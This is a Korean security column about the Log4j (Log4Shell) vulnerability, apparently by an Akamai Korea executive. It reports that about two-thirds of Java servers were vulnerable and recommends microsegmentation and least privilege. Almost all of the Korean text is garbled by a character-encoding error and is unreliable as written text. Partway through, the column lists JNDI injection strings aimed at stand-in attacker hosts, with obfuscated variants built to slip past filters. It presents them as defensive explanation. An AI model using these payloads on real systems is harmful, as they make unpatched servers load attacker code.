¸ðµç Java ¼¹öÀÇ ¾à 3ºÐÀÇ 2°¡ ¿©ÀüÈ÷ Ãë¾àÇØ... °¡½Ã¼º È®º¸ÇØ È¿°úÀûÀ¸·Î ´ëÀÀÇؾß
[º¸¾È´º½º=ÇÑÁØÇü ¾ÆÄ«¸¶ÀÌ ÄÚ¸®¾Æ »ó¹«] 2021³â 11¿ù 24ÀÏ, ¾ÆÆÄÄ¡ ÆÄ¿îµ¥À̼Ç(Apache Foundation)Àº Log4jÀÇ º¸¾È Ãë¾àÁ¡(ºñÀÎÁõ ¿ø°Ý ÄÚµå ½ÇÇà ¹× µ¥ÀÌÅÍ À¯Ãâ CVE-2021-44228)¿¡ ´ëÇØ ºñ°ø°³ Å뺸¸¦ ¹Þ¾Ò´Ù. 2013³âºÎÅÍ Á¸ÀçÇÑ ÀÌ Ãë¾àÁ¡Àº ÀÌÈÄ ´ëÁß¿¡°Ô °ø°³µÇ±â±îÁö 12ÀÏ µ¿¾È ¹®Á¦ ÇØ°áÀ» À§ÇØ ¼Ò½ºÄÚµå º¯°æÀÌ µµÀԵǾú°í, 2021³â 12¿ù 9ÀÏ, ´ëÁß¿¡ °ø°³µÆ´Ù. ÇÏÁö¸¸ ÀÌÈÄ ³î¶ó¿î ¼Óµµ·Î Áõ°¡ÇÏ´Â ÇØ´ç Ãë¾àÁ¡¿¡ ´ëÇÑ ¾Ç¿ë ½Ãµµ´Â ¿ì¸® ¸ðµÎ¸¦ ³î¶ó°Ô Çß´Ù. ½ÉÁö¾î Æ®À§ÅÍ¿¡ ÃÖÃÊ ¾Ë·ÁÁø Á¦·Îµ¥ÀÌ Ãë¾àÁ¡ ÀÌÈÄ, CVE¿¡ ¹øÈ£°¡ ÇÒ´çµÇ±âµµ Àü¿¡ Ãë¾à ¼¹ö¸¦ ã±â À§ÇØ ÀÎÅÍ³Ý Àüü¸¦ ½ºÄµÇÏ´Â ¼¹öµéµµ ¸®Æ÷ÆÃÀÌ µÆ´Ù.
¡ã½Ã°£´ç Log4j Ãë¾àÁ¡À» ³ë¸° °ø°Ý ½Ãµµ[ÀÚ·á=¾ÆÄ«¸¶ÀÌ ÄÚ¸®¾Æ]
Log4j´Â Java±â¹ÝÀÇ ¹«·á ¿ÀǼҽº ·Î±ë À¯Æ¿¸®Æ¼¿©¼ ¼ö¸¹Àº ±â¾÷µéÀÌ »ç¿ëÇϸç, ƯÈ÷³ª ¿©·¯ Ç¥Çö½Ä(expression)ÀÇ Áߺ¹ »ç¿ëÀÌ °¡´ÉÇÏ°í JNDI(Java Naming and Directory Interface, ÀÚ¹Ù ³×ÀÌ¹Ö µð·ºÅ͸® ÀÎÅÍÆäÀ̽º), ·è¾÷(lookups) ¹× ³×½ºÆÃ(nesting) µîÀÇ ¹æ¹ýÀÌ ¼Õ½¬¿ö °¡Àå ÈçÈ÷ »ç¿ëµÈ´Ù´Â Á¡¿¡¼ ÀÌ Ãë¾àÁ¡Àº »ó´çÈ÷ ¿ì·Á½º·¯¿ü´Ù. °úÇбâ¼úÁ¤º¸Åë½ÅºÎ´Â »ç°ÇÀ» ÀÎÁöÇÏÀÚ¸¶ÀÚ ¼¹ö¸¦ »ç¿ëÇÏ´Â Á¶Á÷¿¡ ºü¸¥ Á¶Ä¡¿Í ±ä±Þ º¸¾È ¾÷µ¥ÀÌÆ®¸¦ ±Ç°íÇϱ⵵ Çß´Ù.
¡ãLog4j ÁÖ¿ä ŸÀÓ¶óÀÎ[ÀÚ·á=¾ÆÄ«¸¶ÀÌ ÄÚ¸®¾Æ]
¾ÆÄ«¸¶ÀÌ ¿ª½Ã ±âÁ¸ ¾ÆÆÄÄ¡ ±ÔÄ¢ÀÇ ¾÷µ¥ÀÌÆ®¸¦ ¹èÆ÷ÇÏ°í Adaptive Security Engine(ÀûÀÀÇü ÀÚµ¿ º¸¾È ¿£Áø)À» ÅëÇØ ÀÌ Ãë¾àÁ¡¿¡ ´ëºñÇÒ ¼ö ÀÖ´Â ¾÷µ¥ÀÌÆ®¸¦ Á¦°øÇß´Ù. ÀÌÈÄ ±¹³» ÁÖ¿ä ±â¾÷ ¹× ´Üü´Â Log4jÀÇ ¿µÇâÀ» ¿ÏÈÇÏ°í Á¤º¸¸¦ °øÀ¯Çϱâ À§ÇØ ³ë·ÂÇß´Ù. Çѱ¹ÀÎÅͳÝÁøÈï¿øÀº Log4j Ãë¾àÁ¡ Á¤º¸¸¦ Áö¼ÓÀûÀ¸·Î ¾÷µ¥ÀÌÆ®ÇÏ°í À¥»çÀÌÆ®¿¡ °ü·Ã ³»¿ëÀ» °ø½ÃÇÔÀ¸·Î½á º¸¾È ´ã´çÀÚ°¡ Âü°íÇÏ¿© Áï°¢ÀûÀÎ Á¶Ä¡¸¦ ÃëÇÒ ¼ö ÀÖµµ·Ï Çß´Ù.
±×·¯³ª °úÇбâ¼úÁ¤º¸Åë½ÅºÎ°¡ 2021³âµµ »çÀ̹ö À§Çù°ú 2022³â Àü¸ÁÀ» ºÐ¼®ÇÑ ÃÖ±Ù º¸°í¼¿¡ µû¸£¸é, °ø°ÝÀÚµéÀº °ø±Þ¸Á °ø°ÝÀÇ Ãʱâ ÁøÀÔÁ¡À¸·Î ¼ÒÇÁÆ®¿þ¾îÀÇ Ãë¾àÁ¡À» Áö¼ÓÀûÀ¸·Î ¾Ç¿ëÇÒ °ÍÀ¸·Î ¿¹»óµÈ´Ù°í ÇÑ´Ù. ¶ÇÇÑ »çÀ̹ö ¹üÁË°¡ ÁøÈÇÔ¿¡ µû¶ó Java¿Í °°ÀÌ ³Î¸® »ç¿ëµÇ´Â ¼ÒÇÁÆ®¿þ¾îÀÇ Ãë¾àÁ¡À» È°¿ëÇÏ´Â °ø°ÝÀÌ Á¤±³ÇØÁú °ÍÀ¸·Î ¿¹»óµÈ´Ù. ¾ÈŸ±õ°Ôµµ Log4j´Â Àü ¼¼°èÀûÀ¸·Î ³Î¸® »ç¿ëµÇ´Â ÇÁ·¹ÀÓ¿öÅ©¿Í Java ¾ÖÇø®ÄÉÀ̼ǿ¡ ÅëÇյʿ¡ µû¶ó Àü ¼¼°è Á¶Á÷Àº ³¡³ªÁö ¾ÊÀº »çÀ̹ö À§Çù¿¡ ´ëÀÀÇØ¾ß ÇÑ´Ù.
Log4j Ãë¾àÁ¡Àº ¿Ö Ä¡¸íÀûÀΰ¡
¾ÆÄ«¸¶ÀÌ´Â Java°¡ Á¶Á÷ °£¿¡ ¾ó¸¶³ª ³Î¸® ÆÛÁ® ÀÖ´ÂÁö ÀÌÇØÇϱâ À§ÇØ Àü ¼¼°è 200¿© °÷ÀÇ ´Ù¾çÇÑ µ¥ÀÌÅͼ¾ÅÍ ¹× ºÐ¾ßÀÇ ´ë±Ô¸ð µ¥ÀÌÅ͸¦ ¼öÁýÇß´Ù. ±×¸®°í °¢ µ¥ÀÌÅͼ¾ÅÍ¿¡¼ ÀÎÅÍ³Ý ±â¹Ý ¼¹ö¿Í ³×Æ®¿öÅ© ¿¬°áÀ» Çã¿ëÇÏ´Â Java ½ÇÇà ¼¹ö¸¦ ½Äº°Çß´Ù. Java ÇÁ·Î¼¼½º(java[.]exe, Linux¿ë java, javaw µî)¿Í Java °¡»ó ½Ã½ºÅÛÀ» ÀÚü ¸Þ¸ð¸®¿¡ ·ÎµåÇÏ´Â ÇÁ·Î¼¼½ºµµ ¸ðµÎ Æ÷ÇÔÇØ °í·ÁÇß´Ù.
¡ãJava ¼¹ö ÀÌ¿ë ÇöȲ[ÀÚ·á=¾ÆÄ«¸¶ÀÌ]
ÇØ´çÁ¶»çÀÇ ´ë»ó ȯ°æ¿¡¼ ¿ì¸®´Â Log4Shell °ø°Ý¿¡ Ãë¾àÇÑ ¼¹ö¸¦ ¸¹ÀÌ ¹ß°ßÇß´Ù. ½ÇÁ¦·Î ÀÌ·¯ÇÑ È¯°æ¿¡¼´Â ¸ðµç Java ¼¹öÀÇ 3ºÐÀÇ 2°¡ Ãë¾àÇÑ Log4j¸¦ Æ÷ÇÔÇÑ´Ù´Â »ç½ÇÀ» ¾Ë°Ô µÇ¾úÀ¸¸ç, ÀϺΠȯ°æ¿¡¼´Â 90% ÀÌ»óÀÌ Ãë¾àÇß´Ù. ÀÌ´Â ¿ì¸®ÀÇ ¿¹»óÀ» ¶Ù¾î³Ñ´Â ¼öÄ¡·Î, Ãë¾àÁ¡ÀÌ ¾ó¸¶³ª ±¤¹üÀ§ÇÏ°Ô ÆÛÁ® ÀÖ´ÂÁö ±× ¾ÈŸ±î¿î Çö½ÇÀ» º¸¿©ÁØ´Ù.
¶Ç ´Ù¸¥ Å×½ºÆ®¿¡¼´Â, Á¶»ç ´ë»ó ȯ°æÀÇ 100% ¸ðµÎ ÆÐÄ¡°¡ Àû¿ëµÇÁö ¾ÊÀº »óÅ¿¡¼´Â Àû¾îµµ ÇϳªÀÇ ¼¹ö°¡ Log4Shell¿¡ Ãë¾àÇÑ °ÍÀ¸·Î ³ªÅ¸³µÀ¸¸ç, ÀÌ´Â ÆÐÄ¡°¡ Àû¿ëµÇ±â Àü ¾ó¸¶³ª À§Ç輺ÀÌ Å«Áö¸¦ º¸¿©ÁØ´Ù. ´ÙÇàÈ÷µµ ÆÐÄ¡°¡ ¹èÆ÷µÇ¸é Ãë¾àÇÑ È¯°æÀÇ ¼ö°¡ ÁÙ¾îµå´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ ´ë±Ô¸ð ȯ°æ¿¡¼´Â Ãë¾àÇÑ ¼¹ö°¡ ¼Ò¼ö¿¡ ºÒ°úÇÏ´õ¶óµµ À̵éÀÌ °ø°Ý¸éÀ¸·Î È°¿ëµÇ¾î ½É°¢ÇÑ °á°ú¸¦ ÃÊ·¡ÇÒ ¼ö ÀÖÀ¸¹Ç·Î À¯ÀÇÇØ¾ß ÇÑ´Ù.
Log4j°¡ ³Î¸® º¸±ÞµÇ¸é¼ Á»Ã³·³ º¸±â Èûµç ±Ô¸ð·Î ¼ø½Ä°£¿¡ ³Î¸® È®»êµÆ´Ù. ¸ðµç Java ¼¹öÀÇ ¾à 3ºÐÀÇ 2°¡ ¿©ÀüÈ÷ Ãë¾àÇÏ´Ù´Â »ç½ÇÀº, IT ¹× º¸¾ÈÆÀÀÌ ·Î±ë À¯Æ¿¸®Æ¼¸¦ »ç¿ëÇÒ ¼ö ÀÖ´Â À§Ä¡¸¦ ÆľÇÇÏ°í ¹æ¾î °èȹÀ» ¼¼¿ì±â À§ÇØ ³ë·ÂÇØ¾ß ÇÑ´Ù´Â ¶æÀÌ´Ù.
¡ã°ø°Ý ´ë»ó ±¹°¡[ÀÚ·á=¾ÆÄ«¸¶ÀÌ]
¡ãÃë¾àÁ¡ °ø°Ý ½Ãµµ IPºÐÆ÷[ÀÚ·á=¾ÆÄ«¸¶ÀÌ]
À§ÀÇ ±×·¡ÇÁ¿¡¼ ¾Ë ¼ö ÀÖµíÀÌ ÀÌ Ãë¾àÁ¡À» ³ë¸° °ø°ÝÀº Àü ¼¼°è¸¦ À§ÇùÇßÀ¸¸ç, °ø°Ý¿¡ »ç¿ëµÈ IP´Â ´ÙÀ̳»¹ÍÇÏ°Ô º¯ÈÇØ¿Ô´Ù. °ø°ÝÀº ¸ðµç »ê¾÷À» À§ÇùÇßÀ¸³ª, »ó¾÷ ºÐ¾ß°¡ µ¶º¸ÀûÀ̾ú´Ù. ¾ÈŸ±õ°Ôµµ ±â¾÷ÀÇ º¸¾ÈÆÀÀº Ãë¾àÁ¡ °³¼± ÀÛ¾÷¿¡ ½Ã°£ÀÌ ¿À·¡ °É¸± °ÍÀ̶ó´Â °ÍÀ» ÀÎÁöÇÏ°í ÀÖÀ¸³ª, ´ëºÎºÐ Ãë¾àÇÑ ½Ã½ºÅÛ¿¡ ´ëÇÑ °¡½Ã¼ºÁ¶Â÷ È®º¸ÇÏÁö ¸øÇÏ°í ÀÖ´Â °ÍÀÌ Çö½ÇÀÌ´Ù.
¡ã°ø°Ý ´ë»ó »ê¾÷±º[ÀÚ·á=¾ÆÄ«¸¶ÀÌ]
¶ÇÇÑ, ±²ÀåÇÑ ¼Óµµ·Î ÁøÈÇÏ´Â º¯Çü °ø°ÝµéÀÌ Å½ÁöµÇ¾ú´Ù. Ãʱ⠰ø°Ý °æ·Î´Â ´ÙÀ½°ú °°¾Ò´Ù.
¡¤ ${jndi:ldap://malicious_server_address/}
ÀÌÈÄ, JNDIÀÇ ÀåÁ¡ÀÎ ·è¾÷°ú ³×½ºÆÃÀ¸·Î ¾Æ·¡¿Í °°ÀÌ ÁøÈÇß´Ù.
¡¤ $%7Bjndi:ldap:/x.x.x.x:3339/Exploit%7D
¡¤ ${jndi:rmi:// and ${jndi:dns://
¡¤ ${${lower:j}ndi: and ${${upper:j}ndi:
¡¤ ${${lower:jnd}i:
¡¤ ${${x:-j}ndi:
¡¤ ${${:-j}ndi: and ${${::::::-j}ndi:
ÀÌ´Â ÇØÄ¿ Áý´Ü¿¡¼ ¾ó¸¶³ª ºü¸£°Ô Ãë¾àÁ¡ ÆÐÄ¡ÀÇ ³»¿ëÀ» ÆľÇÇÏ°í, À̸¦ ¿ìȸÇÏ´Â °ø°ÝÀ» Å×½ºÆ®ÇÏ°í °øÀ¯Çß´ÂÁö¸¦ ¿©½ÇÈ÷ ³ªÅ¸³½´Ù. ³ª¾Æ°¡ ¹Ì¶óÀÌ º¿³Ý(Mirai Botnet)ÀÌ CVE-2021-44228¿¡ Á¢¸ñÇØ °ø°ÝÀ» ½ÃµµÇÏ·Á´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ¾úÀ¸¸ç, DNS ÅͳθµÀ¸·Î C2Åë½ÅÀ» ¼û±ä ½Ãµµ ¿ª½Ã È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.
»ç½Ç ¾ÆÄ«¸¶ÀÌ ¿ª½Ã ¸¹Àº º¸¾È ¾÷üµé°ú Çù¾÷ÇØ Àü´ë¹Ì¹®ÀÇ Ãë¾àÁ¡¿¡ ºü¸£°Ô ´ëÀÀÇß´Ù. ÀÌ °úÁ¤¿¡¼ Áö³ 2021³â 12¿ù 17ÀÏ, ¾ÆÄ«¸¶ÀÌ Á÷¿ø È÷µ¥Å° ¿ÀÄ«¸ðÅä(Hideki Okamoto)´Â Log4jÀÇ ¶Ç ´Ù¸¥ Ãë¾àÁ¡ÀÎ CVE-2021-45105À» ÃÖÃÊ·Î ¹ß°ßÇÏ°í º¸°íÇØ, °¢ ¾÷üµéÀÌ ºü¸¥ ´ëÀÀÇÒ ¼ö ÀÖµµ·Ï µµ¿Ô´Ù.
¸¶ÀÌÅ©·Î¼¼±×¸àÅ×À̼ÇÀ¸·Î º¸¾È °È
¸¹Àº Á¶Á÷Àº Log4j Ãë¾àÁ¡ÀÌ ÃÊ·¡ÇÑ ¿µÇâÀ» Æò°¡ÇÏ°í ¿ÏÈ Àü·«À» ±¸ÃàÇϱâ À§ÇØ ¼µÎ¸£¸ç ´ëÈ¥¶õÀ» °Þ¾ú´Ù. ±×·¯³ª ¾ÕÀ¸·Îµµ ÀÌ·¯ÇÑ À¯ÇüÀÇ Ãë¾àÁ¡Àº °è¼Ó Á¸ÀçÇÒ »Ó¸¸ ¾Æ´Ï¶ó ºóµµ¿Í ÇÇÇØ ¹üÀ§µµ °è¼Ó È®´ëµÉ °ÍÀÌ´Ù. µû¶ó¼ »çÈÄ ´ëÀÀÀû º¸¾ÈÀ¸·Î ¾î´À Á¤µµ º¸È£ÇÒ ¼ö ÀÖÁö¸¸, ¸¶ÀÌÅ©·Î¼¼±×¸àÅ×À̼Ç(Microsegmentation) ¼Ö·ç¼Ç°ú °°Àº ¼±Á¦Àû º¸¾È ¹æ¹ýÀ» È°¿ëÇÏ´Â °ÍÀÌ Áß¿äÇÏ´Ù.
¸¶ÀÌÅ©·Î¼¼±×¸àÅ×ÀÌ¼Ç ±â¼úÀº ±â¾÷À» °³º° ¼ÒÇÁÆ®¿þ¾î ¹× ¿öÅ©·Îµå ¼öÁرîÁö º°°³ÀÇ º¸¾È ¼¼±×¸àÆ®·Î ³í¸®ÀûÀ¸·Î ³ª´©°í, °¢°¢¿¡ ´ëÇØ Àß Á¤ÀÇµÈ º¸¾È Á¦¾î¸¦ Á¦°øÇÑ´Ù. ÀÌ Á¢±Ù ¹æ½ÄÀº µ¿¼(east-west) À̵¿À» ÅëÇØ ±â¾÷ Àüü¿¡ È®»êµÇ´Â ¸Ö¿þ¾î(Malware) ¹®Á¦¸¦ ÇØ°áÇÑ´Ù. ¼±Ã¼¿¡ ±Õ¿ÀÌ ¹ß»ýÇÒ °æ¿ì ÇÔ³»ÀÇ ¹æ¼ö Â÷´Üº®ÀÌ ÀÎÁ¢ °´½ÇÀÇ Ä§¼ö¸¦ ¹æÁöÇÏ´Â °Í°ú °°ÀÌ, ¸¶ÀÌÅ©·Î¼¼±×¸àÅ×À̼ÇÀº ¸Ö¿þ¾î °ø°ÝÀ¸·Î ÀÎÇÑ ¡®¿µÇâ·Â ¹Ý°æ¡¯À» ¾ïÁ¦ÇØ Ãø¸é È®»êÀ» Å©°Ô Á¦ÇÑÇÑ´Ù. ´Ü¼øÇÑ °³³äÀ¸·Î º¸ÀÌÁö¸¸ À̸¦ ±¸ÇöÇÏ´Â °ÍÀº ¸Å¿ì ¾î·Á¿î ÀÏÀÌ´Ù. ÃֽŠ³×Æ®¿öÅ©°¡ ±Øµµ·Î ÀÌÁúÀûÀ̸ç Áö¼ÓÀûÀ¸·Î º¯ÈÇÏ°í Àֱ⠶§¹®ÀÌ´Ù. °¡»óÈ, ÄÁÅ×À̳ÊÈ ¹× ±âŸ ÃֽŠ¼ÒÇÁÆ®¿þ¾î ¹èÄ¡ ¹æ½ÄÀº ¿öÅ©·Îµå°¡ µ¥ÀÌÅͼ¾ÅÍ ³», ±×¸®°í µ¥ÀÌÅÍ ¼¾ÅÍ¿Í Å¬¶ó¿ìµå °£ °æ°è¸¦ °¡·ÎÁú·¯ Áö¼ÓÀûÀ¸·Î ÁøÈÇÏ°í ÀÖÀ½À» ÀǹÌÇÑ´Ù.
¸¶ÀÌÅ©·Î¼¼±×¸àÅ×À̼ÇÀº Log4j Ãë¾àÁ¡ÀÌ ÀÖÀ» °¡´É¼ºÀÌ ÀÖ´Â ½Ã½ºÅÛÀ» °Ý¸®ÇÏ°í ¾Ç¿ë ½Ãµµ·ÎºÎÅÍ º¸È£ÇÏ¸ç ¼º°øÀûÀ¸·Î ÇØÅ·µÈ ½Ã½ºÅÛÀÌ ´Ù¸¥ ½Ã½ºÅÛÀ» °ø°ÝÇÏÁö ¸øÇϵµ·Ï ¹æ¾îÇÔÀ¸·Î½á °ø°Ý Ç¥¸éÀ» ´ëÆø ÁÙÀÏ ¼ö ÀÖ´Â ¹æ¹ýÀ» Á¦°øÇÑ´Ù. °ø°ÝÀÚ°¡ ÀÎÅͳÝÀ» °Ë»öÇØ Ãë¾àÇÑ ¼¹ö¿Í ¾ÖÇø®ÄÉÀ̼ÇÀ» ã´Â °ÍÀº Àß ¾Ë·ÁÁø »ç½ÇÀÌ´Ù. ÀÌÈÄ °ø°ÝÀÚ´Â ÀԷ ä³ÎÀ» »ç¿ëÇØ ¾Ç¼º Äڵ带 ½É´Â´Ù. µû¶ó¼ °ø°Ý¸éÀ» ÁÙÀÌ´Â °ÍÀÌ ¸Å¿ì Áß¿äÇÏ´Ù. ¶ÇÇÑ, ³×Æ®¿öÅ©¸¦ ºÐÇÒÇϸé Ãë¾àÇÑ ¼¹ö¸¦ °Ý¸®ÇÒ ¼ö ÀÖ¾î ´õ¿í °¡Ä¡ ÀÖ´Â Àڻ꿡 ´ëÇÑ º¸È£¸¦ °ÈÇÒ ¼ö ÀÖ´Ù.
ÇâÈÄ Log4j Ãë¾àÁ¡ ¾Ç¿ë ´ëºñ¸¦ À§ÇÑ ±ÇÀå»çÇ×
¾ÆÄ«¸¶ÀÌ´Â 2021³â 12¿ù 9ÀÏ¿¡ Log4j Ãë¾àÁ¡À» ¾Ç¿ëÇÑ º¸¾È À§ÇùÀ» óÀ½ °üÃøÇßÁö¸¸ ¼ö°³¿ù ÀüºÎÅÍ ÀÌ Ãë¾àÁ¡ÀÌ ¾Ç¿ëµÇ¾úÀ»Áöµµ ¸ð¸¥´Ù´Â Áõ°Å¸¦ È®ÀÎÇß´Ù. Áö±Ý±îÁö È®ÀÎµÈ °ø°ÝÀÇ Àý¹Ý ÀÌ»ó(~57%)Àº ÀÌÀü¿¡ ¾ÆÄ«¸¶ÀÌÀÇ À§Çù ÀÎÅÚ¸®Àü½º µ¥ÀÌÅͺ£À̽º(Threat Intelligence Database)¿¡¼ ¾ÇÀÇÀû ÇàÀ§ÀÚ·Î ºÐ·ùµÈ °ø°ÝÀڷκÎÅÍ ¹ß»ýÇß´Ù.
Á¡Á¡ ´õ ¸¹Àº ½Ã½ºÅÛ°ú ¼ÒÇÁÆ®¿þ¾î°¡ Ÿ»ç ÄÚµå·Î ÀÌ·ç¾îÁø ·¹À̾î À§¿¡ ±¸¼ºµÊ¿¡ µû¶ó, ±â¾÷Á¶Á÷Àº ¾ÕÀ¸·Î ƯÁ¤ ¶óÀ̺귯¸®³ª ÆÄÆ®³ÊÀÇ ¸®½ºÅ©¸¦ Æò°¡ÇÒ »Ó¸¸ ¾Æ´Ï¶ó ÇØ´ç °³¹ß Ä¿¹Â´ÏƼ³ª º¥´õ¸¦ È®ÀÎÇØ Á¾¼Ó¼º ¿ª½Ã ¸é¹ÐÈ÷ Æò°¡ÇÏ°Ô Çϵµ·Ï ÇØ¾ß ÇÑ´Ù. ¶ÇÇÑ, ÀÌ·¯ÇÑ ¸®½ºÅ©¸¦ Æò°¡ÇÏ´õ¶óµµ Ãë¾àÁ¡Àº ¹ß»ýÇÒ °ÍÀ̶ó´Â °ÍÀ» ÀÎÁöÇØ¾ß ÇÑ´Ù. Áß¿äÇÑ °ÍÀº »óȲÀ» ´õ È¿°úÀûÀ¸·Î ÇØ°áÇÒ ¼ö ¹æ¹ýÀÌÁö »óȲÀ» ¿ÏÀüÈ÷ ¸·À» ¼ö ÀÖ´Â ¹æ¹ýÀÌ ¾Æ´Ï´Ù. À̸¦ À§Çؼ´Â °¡½Ã¼º È®º¸°¡ ¸Å¿ì Áß¿äÇÏ´Ù. ¸¹Àº Á¶Á÷ÀÌ ¾î¶² ½Ã½ºÅÛÀÌ ¿µÇâÀ» ¹Þ´ÂÁö ¸ð¸£±â ¶§¹®¿¡ ÆÐÄ¡¸¦ Àû¿ëÇϴµ¥ ¾î·Á¿òÀ» °Þ°í ÀÖ´Ù. ±â¾÷Àº µ¥ÀÌÅͼ¾ÅÍ¿Í Å¬¶ó¿ìµå¿¡¼ ½ÇÇàµÇ´Â µ¥ÀÌÅ͸¦ ÆľÇÇÒ ¼ö ÀÖ´Â ½Ã½ºÅÛÀ» °®Ãç¾ß ÇÑ´Ù. °¡½Ã¼ºÀÌ º¸´Ù Æ÷°ýÀûÀÌ°í Á¤È®Çϸé Á¶Á÷Àº ´õ »¡¸® ´ëÀÀÇÏ°í ÇÊ¿ä Àڻ꿡 ÆÐÄ¡¸¦ Àû¿ëÇÒ ¼ö ÀÖ´Ù.
¸¶Áö¸·À¸·Î Á¶Á÷Àº ÃÖ¼Ò ±ÇÇÑ ¿øÄ¢À» ¿ÏÀüÈ÷ ¼ö¿ëÇØ¾ß ÇÑ´Ù. ¼¹ö, ÄÄÇ»ÅÍ, ¼ÒÇÁÆ®¿þ¾î¸¦ ºÀ¼âÇÏ¿© ÀÛ¾÷À» ¼öÇàÇÏ´Â µ¥ ÇÊ¿äÇÑ ½Ã½ºÅÛ¿¡¸¸ Á¢±ÙÀ» Çã¿ëÇØ¾ß ÇÑ´Ù. °ü¸® ÁßÀÎ ¸ðµç ½Ã½ºÅÛ°ú ¼ÒÇÁÆ®¿þ¾î¿¡ ÃÖ¼Ò ±ÇÇÑ ¿øÄ¢À» Àû¿ëÇϸé Ãë¾àÁ¡ÀÌ ¹ß»ýÇÒ ¶§ À§Çù¸éÀ» Å©°Ô ÁÙÀÏ ¼ö ÀÖÀ¸¸ç, ´ëºÎºÐÀÇ °æ¿ì ¿µÇâÀ» ¹Þ±â Àü¿¡ °ø°Ý üÀÎÀ» ÁßÁöÇÒ ¼ö ÀÖ´Ù.
Log4j Ãë¾àÁ¡Àº Àü ¼¼°è Á¶Á÷¿¡°Ô º¹ÀâÇÏ°í À§ÇèÇÑ »óȲÀ» Á¦½ÃÇÑ´Ù. ¿ì¸®´Â ¾ÕÀ¸·Îµµ ±¤¹üÀ§ÇÑ À§Çù Ç¥¸é°ú ÆÐÄ¡µÇÁö ¾ÊÀº ½Ã½ºÅÛÀ¸·Î ÀÎÇØ °ø°Ý ½Ãµµ°¡ Ç¥¸éÈµÇ°í ±× °úÁ¤¿¡¼ ¸¹Àº ±â¾÷°ú Á¶Á÷ÀÌ ¿µÇâÀ» ¹Þ´Â °ÍÀ» º¸°Ô µÉ °ÍÀÌ´Ù. ±×·¯³ª º¸¾È ½Ã½ºÅÛ °È¸¦ À§ÇØ ³ë·ÂÇÏ´Â ±â¾÷Àº ±× ¾î´À ¶§º¸´Ù ºü¸£°Ô ȸº¹ÇÒ °ÍÀÌ´Ù.
[±Û_ÇÑÁØÇü ¾ÆÄ«¸¶ÀÌ ÄÚ¸®¾Æ »ó¹«]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(www.boannews.com) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>